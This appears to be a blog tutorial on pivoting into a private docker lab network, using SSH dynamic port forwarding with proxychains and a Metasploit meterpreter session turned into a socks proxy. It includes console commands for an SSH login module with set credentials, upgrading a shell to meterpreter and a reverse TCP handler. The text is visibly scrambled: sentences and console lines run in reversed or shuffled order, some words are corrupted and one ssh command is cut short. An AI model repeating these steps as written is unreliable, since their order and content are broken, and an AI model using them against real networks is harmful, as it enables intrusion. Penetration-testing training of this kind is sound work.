Setup and run a socks proxy over meterpreter Normally you would use the meterpreter session to enumerate network access, but I am going to skip that here and just setup a proxy to the private network. I have setup two internal docker networks, public and private, which in my examples are 172.20.0.0/24 (private) and 172.21.0.0/24 (public). One slight complication with the docker setup I am showing is the networking. Started reverse TCP handler on 172.21.0.3:4433 SESSION may not be compatible with this module. Executing 'post/multi/manage/shell_to_meterpreter' on session(s): Msf5 auxiliary(scanner/ssh/ssh_login) > sessions -u 1 Msf5 auxiliary(scanner/ssh/ssh_login) > exploit Msf5 auxiliary(scanner/ssh/ssh_login) > set PASSWORD letspivot Msf5 auxiliary(scanner/ssh/ssh_login) > set USERNAME pentester Msf5 auxiliary(scanner/ssh/ssh_login) > set RHOSTS ssh Msf5 > use auxiliary/scanner/ssh/ssh_login $ docker exec -it pivots_metasploit_1 /bin/bash The below will jump from our machine into the metasploit docker container, start metasploit, and create a meterpreter over SSH connection. We'll run meterpreter over SSH for this example, but the steps would be the same for any meterpreter session once connected. Unfortunately, socks4 proxies only generally support TCP protocols, and certain kinds of traffic won't work well, so full nmap and similar tool usage may not be possible. If you are using the docker compose file provided, I include a slightly modified metasploit image on the public network. Similar to SSH, meterpreter can become a socks proxy, though I have generally found it less reliable than SSH. Some servers don't run SSH, and I often like to leverage meterpreter once I find an initial entry vector for a variety of reasons. Method 2: Pivot With Meterpreter and socks proxy RDNS record for 224.0.0.1: ĩ001/tcp open jdbc HSQLDB JDBC (Network Compatibility Version 2.3.4.0) You could use any normal ip range on the target network instead. Note I use the network "webgoat" because the docker-compose network sets up this dns name. Here is an nmap scan of the webgoat host. In /etc/nf (or similar depending on version), add the following to the end of the file: socks5 127.0.0.1 9000 This sets up an SSH tunnel in the background on local port 9000. Assuming you are using the sample environment: ssh -D localhost:9000 -f -N -p 20022 Setting up the tunnelįirst login with SSH using dynamic port forwarding. Non-root accounts may limit some tools from working fully (such as nmap), when creating certain types of packets are root only activities. A password compromise or writing of a public key for entry, to a user that allows remote SSH login.SSH service running on target machine and reachable from the attacker machine.It requires the following pre-conditions to leverage: This method allows mostly complete access to the target network, with few limitations, and is generally my preferred way to access gated networks. Run a command with proxychains, which tunnels data over the SSH proxy.This works great in tools that support it like Burp. In a tool, configure a SOCKS proxy and point it to the SSH tunnel.This method leverages SSH with dynamic port forwarding to create a socks proxy, with proxychains to help with tools that can't use socks proxies. You can get this environment running with docker and docker compose by checking out the repository, then running docker-compose build and docker-compose up. The SSH machine is accessible from localhost on port 20022 instead of 22, but you can also use the metasploit container for all testing.
0 Comments
Leave a Reply. |
AuthorWrite something about yourself. No need to be fancy, just an overview. ArchivesCategories |